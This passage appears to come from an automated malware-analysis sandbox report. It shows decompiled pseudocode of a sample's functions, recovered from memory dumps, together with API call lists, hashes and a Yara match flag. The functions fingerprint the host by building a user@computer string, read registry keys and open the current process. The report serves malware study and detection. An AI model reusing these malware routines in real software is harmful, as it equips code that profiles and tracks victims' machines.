                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1886625739-0
                                                                                                                                                                                                                                • Opcode ID: a1aac9641869cf57c5f9968d650abc7c6df0524375442cabc4e165fa5ebcb5e8
                                                                                                                                                                                                                                • Instruction ID: 41aef0cba4c2a80657b7a097d16eab7bed4a06df7e6c14bda5f7a64200cd4ec9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1aac9641869cf57c5f9968d650abc7c6df0524375442cabc4e165fa5ebcb5e8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A521607490060AAFD716DF69D944EAABBFCFF083847014469E685C7210D7F4EA05CFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                			E02BB4847(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				signed int* _v16;
                                                                                                                                                                                                                                				char _v284;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				char* _t59;
                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                				intOrPtr _t64;
                                                                                                                                                                                                                                				char _t65;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				intOrPtr _t69;
                                                                                                                                                                                                                                				intOrPtr _t71;
                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                				signed int _t81;
                                                                                                                                                                                                                                				void* _t91;
                                                                                                                                                                                                                                				void* _t92;
                                                                                                                                                                                                                                				char _t98;
                                                                                                                                                                                                                                				signed int* _t100;
                                                                                                                                                                                                                                				intOrPtr* _t101;
                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t92 = __ecx;
                                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                				_t98 = _a16;
                                                                                                                                                                                                                                				if(_t98 == 0) {
                                                                                                                                                                                                                                					__imp__( &_v284,  *0x2bbd37c);
                                                                                                                                                                                                                                					_t91 = 0x80000002;
                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                					_t59 = E02BB3037( &_v284,  &_v284);
                                                                                                                                                                                                                                					_a8 = _t59;
                                                                                                                                                                                                                                					if(_t59 == 0) {
                                                                                                                                                                                                                                						_v8 = 8;
                                                                                                                                                                                                                                						L29:
                                                                                                                                                                                                                                						_t60 = _a20;
                                                                                                                                                                                                                                						if(_t60 != 0) {
                                                                                                                                                                                                                                							 *_t60 =  *_t60 + 1;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						return _v8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t101 = _a24;
                                                                                                                                                                                                                                					if(E02BB2B5D(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                                                                                                                                                                                                						L27:
                                                                                                                                                                                                                                						E02BB53BB(_a8);
                                                                                                                                                                                                                                						goto L29;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t64 =  *0x2bbd2b0; // 0x52f9bb8
                                                                                                                                                                                                                                					_t16 = _t64 + 0xc; // 0x52f9c86
                                                                                                                                                                                                                                					_t65 = E02BB3037(_t64,  *_t16);
                                                                                                                                                                                                                                					_a24 = _t65;
                                                                                                                                                                                                                                					if(_t65 == 0) {
                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                						_t29 = _t101 + 0x14; // 0x102
                                                                                                                                                                                                                                						_t33 = _t101 + 0x10; // 0x3d02bbc0
                                                                                                                                                                                                                                						if(E02BB9BAF(_t97,  *_t33, _t91, _a8,  *0x2bbd374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                                                                                                                                                                                                							_t68 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                							if(_t98 == 0) {
                                                                                                                                                                                                                                								_t35 = _t68 + 0x2bbea48; // 0x4d4c4b48
                                                                                                                                                                                                                                								_t69 = _t35;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t34 = _t68 + 0x2bbea43; // 0x55434b48
                                                                                                                                                                                                                                								_t69 = _t34;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(E02BB5E8A(_t69,  *0x2bbd374,  *0x2bbd378,  &_a24,  &_a16) == 0) {
                                                                                                                                                                                                                                								if(_t98 == 0) {
                                                                                                                                                                                                                                									_t71 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                									_t44 = _t71 + 0x2bbe83e; // 0x74666f53
                                                                                                                                                                                                                                									_t73 = E02BB3037(_t44, _t44);
                                                                                                                                                                                                                                									_t99 = _t73;
                                                                                                                                                                                                                                									if(_t73 == 0) {
                                                                                                                                                                                                                                										_v8 = 8;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t47 = _t101 + 0x10; // 0x3d02bbc0
                                                                                                                                                                                                                                										E02BB9BED( *_t47, _t91, _a8,  *0x2bbd378, _a24);
                                                                                                                                                                                                                                										_t49 = _t101 + 0x10; // 0x3d02bbc0
                                                                                                                                                                                                                                										E02BB9BED( *_t49, _t91, _t99,  *0x2bbd370, _a16);
                                                                                                                                                                                                                                										E02BB53BB(_t99);
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t40 = _t101 + 0x10; // 0x3d02bbc0
                                                                                                                                                                                                                                									E02BB9BED( *_t40, _t91, _a8,  *0x2bbd378, _a24);
                                                                                                                                                                                                                                									_t43 = _t101 + 0x10; // 0x3d02bbc0
                                                                                                                                                                                                                                									E02BB9BED( *_t43, _t91, _a8,  *0x2bbd370, _a16);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								if( *_t101 != 0) {
                                                                                                                                                                                                                                									E02BB53BB(_a24);
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									 *_t101 = _a16;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L27;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t21 = _t101 + 0x10; // 0x3d02bbc0
                                                                                                                                                                                                                                					_t81 = E02BB63D1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                                                                                                                                                                                                					if(_t81 == 0) {
                                                                                                                                                                                                                                						_t100 = _v16;
                                                                                                                                                                                                                                						if(_v12 == 0x28) {
                                                                                                                                                                                                                                							 *_t100 =  *_t100 & _t81;
                                                                                                                                                                                                                                							_t26 = _t101 + 0x10; // 0x3d02bbc0
                                                                                                                                                                                                                                							E02BB9BAF(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						E02BB53BB(_t100);
                                                                                                                                                                                                                                						_t98 = _a16;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					E02BB53BB(_a24);
                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                                                                                                                					goto L29;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t97 = _a8;
                                                                                                                                                                                                                                					E02BBA929(_t98, _a8,  &_v284);
                                                                                                                                                                                                                                					__imp__(_t102 + _t98 - 0x117,  *0x2bbd37c);
                                                                                                                                                                                                                                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                                                                                                                                                                                                					_t91 = 0x80000003;
                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}
























                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(02BB51FC,0000005F,00000000,00000000,00000104), ref: 02BB487A
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 02BB48A7
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: lstrlen.KERNEL32(?,00000000,052F9BB8,00000000,02BB6F37,052F9D96,?,?,?,?,?,69B25F44,00000005,02BBD00C), ref: 02BB303E
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: mbstowcs.NTDLL ref: 02BB3067
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: memset.NTDLL ref: 02BB3079
                                                                                                                                                                                                                                  • Part of subcall function 02BB9BED: lstrlenW.KERNEL32(?,?,?,02BB4A10,3D02BBC0,80000002,02BB51FC,02BB2DE9,74666F53,4D4C4B48,02BB2DE9,?,3D02BBC0,80000002,02BB51FC,?), ref: 02BB9C12
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 02BB48C9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                                                                                                                • String ID: ($\
                                                                                                                                                                                                                                • API String ID: 3924217599-1512714803
                                                                                                                                                                                                                                • Opcode ID: 39ff9a75fc3cf743de7fae824825f3557e98d61fcd1070d17bcf10787bdb68de
                                                                                                                                                                                                                                • Instruction ID: 11d0065dd2671e9b913a36eca69447de9410c16ee239dae144b917d01a2133ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39ff9a75fc3cf743de7fae824825f3557e98d61fcd1070d17bcf10787bdb68de
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E51487150060AAFDF239F60D950EEA37BAFF08344F008995FA6592121D7B5E925EF10
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B81D65() {
                                                                                                                                                                                                                                				void* _t1;
                                                                                                                                                                                                                                				unsigned int _t3;
                                                                                                                                                                                                                                				void* _t4;
                                                                                                                                                                                                                                				long _t5;
                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t10 =  *0x2b841b0;
                                                                                                                                                                                                                                				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                				 *0x2b841bc = _t1;
                                                                                                                                                                                                                                				if(_t1 == 0) {
                                                                                                                                                                                                                                					return GetLastError();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t3 = GetVersion();
                                                                                                                                                                                                                                				if(_t3 != 5) {
                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                					if(_t14 <= 0) {
                                                                                                                                                                                                                                						_t4 = 0x32;
                                                                                                                                                                                                                                						return _t4;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(_t3 >> 8 > 0) {
                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                						 *0x2b841ac = _t3;
                                                                                                                                                                                                                                						_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                						 *0x2b841a8 = _t5;
                                                                                                                                                                                                                                						 *0x2b841b0 = _t10;
                                                                                                                                                                                                                                						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                						 *0x2b841a4 = _t6;
                                                                                                                                                                                                                                						if(_t6 == 0) {
                                                                                                                                                                                                                                							 *0x2b841a4 =  *0x2b841a4 | 0xffffffff;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t14 = _t3 - _t3;
                                                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,02B81577), ref: 02B81D74
                                                                                                                                                                                                                                • GetVersion.KERNEL32 ref: 02B81D83
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 02B81D9F
                                                                                                                                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02B81DB8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 845504543-1084903527
                                                                                                                                                                                                                                • Opcode ID: 8291df9e496abd86d6c20688d91f064d814c881c747ed7f4f4bfc279259efef0
                                                                                                                                                                                                                                • Instruction ID: 4481cf95d44caffaf36a22c8bbcd34318473ba79a41be9a37d35b758acbd6328
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8291df9e496abd86d6c20688d91f064d814c881c747ed7f4f4bfc279259efef0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86F01971ED5302ABE711AE68BC057653FE0EB05B91F104895E50DEB1C0F7B080A6CB54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E02BB7095() {
                                                                                                                                                                                                                                				void* _v0;
                                                                                                                                                                                                                                				void** _t3;
                                                                                                                                                                                                                                				void** _t5;
                                                                                                                                                                                                                                				void** _t7;
                                                                                                                                                                                                                                				void** _t8;
                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t3 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                				__imp__( &(_t3[0x10]));
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t5 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                                                                					if( *_t1 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					Sleep(0xa);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t7 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                				_t10 =  *_t7;
                                                                                                                                                                                                                                				if(_t10 != 0 && _t10 != 0x2bbe823) {
                                                                                                                                                                                                                                					HeapFree( *0x2bbd270, 0, _t10);
                                                                                                                                                                                                                                					_t7 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				 *_t7 = _v0;
                                                                                                                                                                                                                                				_t8 =  &(_t7[0x10]);
                                                                                                                                                                                                                                				__imp__(_t8);
                                                                                                                                                                                                                                				return _t8;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(052F9570), ref: 02BB709E
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,02BB5884), ref: 02BB70A8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,02BB5884), ref: 02BB70D6
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(052F9570), ref: 02BB70EB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: df1eda996b4e7588c917298aa524b1638f58e16a2f74ab9bf0c2590aad4be128
                                                                                                                                                                                                                                • Instruction ID: 1c71725c45008d6d91cbbffcf7d83b8a192bf3295a966d82743cd6348a34e940
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df1eda996b4e7588c917298aa524b1638f58e16a2f74ab9bf0c2590aad4be128
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01F03475E882029FEB1ACF64DA89F657BA0FF44380B44884AF502C7250CBF4E820DA24
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB6706() {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				int _v16;
                                                                                                                                                                                                                                				long _t39;
                                                                                                                                                                                                                                				long _t43;
                                                                                                                                                                                                                                				signed int _t47;
                                                                                                                                                                                                                                				short _t51;
                                                                                                                                                                                                                                				signed int _t52;
                                                                                                                                                                                                                                				int _t56;
                                                                                                                                                                                                                                				int _t57;
                                                                                                                                                                                                                                				char* _t64;
                                                                                                                                                                                                                                				short* _t67;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				GetUserNameW(0,  &_v8);
                                                                                                                                                                                                                                				_t39 = _v8;
                                                                                                                                                                                                                                				if(_t39 != 0) {
                                                                                                                                                                                                                                					_v12 = _t39;
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                					_t43 = _v8;
                                                                                                                                                                                                                                					if(_t43 != 0) {
                                                                                                                                                                                                                                						_v12 = _v12 + _t43 + 2;
                                                                                                                                                                                                                                						_t64 = E02BB5157(_v12 + _t43 + 2 << 2);
                                                                                                                                                                                                                                						if(_t64 != 0) {
                                                                                                                                                                                                                                							_t47 = _v12;
                                                                                                                                                                                                                                							_t67 = _t64 + _t47 * 2;
                                                                                                                                                                                                                                							_v8 = _t47;
                                                                                                                                                                                                                                							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                                                                                                                                                								L7:
                                                                                                                                                                                                                                								E02BB53BB(_t64);
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t51 = 0x40;
                                                                                                                                                                                                                                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                                                                                                                                                								_t52 = _v8;
                                                                                                                                                                                                                                								_v12 = _v12 - _t52;
                                                                                                                                                                                                                                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                                                                                                                                                									goto L7;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t56 = _v12 + _v8;
                                                                                                                                                                                                                                									_t31 = _t56 + 2; // 0x2bba626
                                                                                                                                                                                                                                									_v12 = _t56;
                                                                                                                                                                                                                                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                                                                                                                                                									_v8 = _t57;
                                                                                                                                                                                                                                									if(_t57 == 0) {
                                                                                                                                                                                                                                										goto L7;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t64[_t57] = 0;
                                                                                                                                                                                                                                										_v16 = _t64;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v16;
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                0x02bb67bc
                                                                                                                                                                                                                                0x02bb67c1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb67c3
                                                                                                                                                                                                                                0x02bb67c3
                                                                                                                                                                                                                                0x02bb67c6
                                                                                                                                                                                                                                0x02bb67c6
                                                                                                                                                                                                                                0x02bb67c1
                                                                                                                                                                                                                                0x02bb679b
                                                                                                                                                                                                                                0x02bb67d1
                                                                                                                                                                                                                                0x02bb67d2
                                                                                                                                                                                                                                0x02bb6741
                                                                                                                                                                                                                                0x02bb67d8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,02BBA624), ref: 02BB671A
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,02BBA624), ref: 02BB6736
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,02BBA624), ref: 02BB6770
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(02BBA624,?), ref: 02BB6793
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02BBA624,00000000,02BBA626,00000000,00000000,?,?,02BBA624), ref: 02BB67B6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850880919-0
                                                                                                                                                                                                                                • Opcode ID: fc2830b7b749b6d7b9e71ded10567588e07435ca5e616ae375c897abe62bc012
                                                                                                                                                                                                                                • Instruction ID: 7ff4f3717b0d6b831c1af63871559c527bfadca3efe3795376bebddf0429d87b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc2830b7b749b6d7b9e71ded10567588e07435ca5e616ae375c897abe62bc012
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F021C9B6900108FFCB12DFA5C984DEEBBBDEF44644B5044AAE502E7600E7B09E55DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 18%
                                                                                                                                                                                                                                			E02BB9EEE(void* __esi) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				long* _v20;
                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                				long* _t47;
                                                                                                                                                                                                                                				intOrPtr* _t63;
                                                                                                                                                                                                                                				intOrPtr* _t64;
                                                                                                                                                                                                                                				char* _t65;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t36 =  *((intOrPtr*)(__esi + 0x28));
                                                                                                                                                                                                                                				_t63 = __esi + 0x2c;
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				 *_t63 = 0;
                                                                                                                                                                                                                                				_v12 = _t36;
                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					return _v12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v8 = 4;
                                                                                                                                                                                                                                				__imp__( *((intOrPtr*)(__esi + 0x18)), 0);
                                                                                                                                                                                                                                				if(_t36 == 0) {
                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                					_v12 = GetLastError();
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_push( &_v16);
                                                                                                                                                                                                                                				_push( &_v8);
                                                                                                                                                                                                                                				_push(_t63);
                                                                                                                                                                                                                                				_t64 = __imp__; // 0x7021fd20
                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                				_push(0x20000013);
                                                                                                                                                                                                                                				_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                                                                                                                                				if( *_t64() == 0) {
                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                					_t47 = E02BB5157(_v8 + 2);
                                                                                                                                                                                                                                					_v20 = _t47;
                                                                                                                                                                                                                                					if(_t47 == 0) {
                                                                                                                                                                                                                                						_v12 = 8;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_push( &_v16);
                                                                                                                                                                                                                                						_push( &_v8);
                                                                                                                                                                                                                                						_push(_t47);
                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                						_push(0x16);
                                                                                                                                                                                                                                						_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                                                                                                                                						if( *_t64() == 0) {
                                                                                                                                                                                                                                							_v12 = GetLastError();
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v8 = _v8 >> 1;
                                                                                                                                                                                                                                							 *((short*)(_v20 + _v8 * 2)) = 0;
                                                                                                                                                                                                                                							_t65 = E02BB5157(_v8 + 1);
                                                                                                                                                                                                                                							if(_t65 == 0) {
                                                                                                                                                                                                                                								_v12 = 8;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								wcstombs(_t65, _v20, _v8 + 1);
                                                                                                                                                                                                                                								 *(__esi + 0xc) = _t65;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						E02BB53BB(_v20);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                0x02bb9f3c
                                                                                                                                                                                                                                0x02bb9f43
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb9f49
                                                                                                                                                                                                                                0x02bb9f58
                                                                                                                                                                                                                                0x02bb9f5b
                                                                                                                                                                                                                                0x02bb9f5e
                                                                                                                                                                                                                                0x02bb9f67
                                                                                                                                                                                                                                0x02bb9f6c
                                                                                                                                                                                                                                0x02bb9f71
                                                                                                                                                                                                                                0x02bb9fd9
                                                                                                                                                                                                                                0x02bb9f73
                                                                                                                                                                                                                                0x02bb9f76
                                                                                                                                                                                                                                0x02bb9f7a
                                                                                                                                                                                                                                0x02bb9f7b
                                                                                                                                                                                                                                0x02bb9f7c
                                                                                                                                                                                                                                0x02bb9f7d
                                                                                                                                                                                                                                0x02bb9f7f
                                                                                                                                                                                                                                0x02bb9f86
                                                                                                                                                                                                                                0x02bb9fcc
                                                                                                                                                                                                                                0x02bb9f88
                                                                                                                                                                                                                                0x02bb9f88
                                                                                                                                                                                                                                0x02bb9f93
                                                                                                                                                                                                                                0x02bb9fa1
                                                                                                                                                                                                                                0x02bb9fa5
                                                                                                                                                                                                                                0x02bb9fbd
                                                                                                                                                                                                                                0x02bb9fa7
                                                                                                                                                                                                                                0x02bb9fb0
                                                                                                                                                                                                                                0x02bb9fb8
                                                                                                                                                                                                                                0x02bb9fb8
                                                                                                                                                                                                                                0x02bb9fa5
                                                                                                                                                                                                                                0x02bb9fd2
                                                                                                                                                                                                                                0x02bb9fd2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb9f71

APIs
• GetLastError.KERNEL32 ref: 02BB9FE2
  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
• wcstombs.NTDLL ref: 02BB9FB0
• GetLastError.KERNEL32 ref: 02BB9FC6
Strings
Memory Dump Source
• Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
• Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
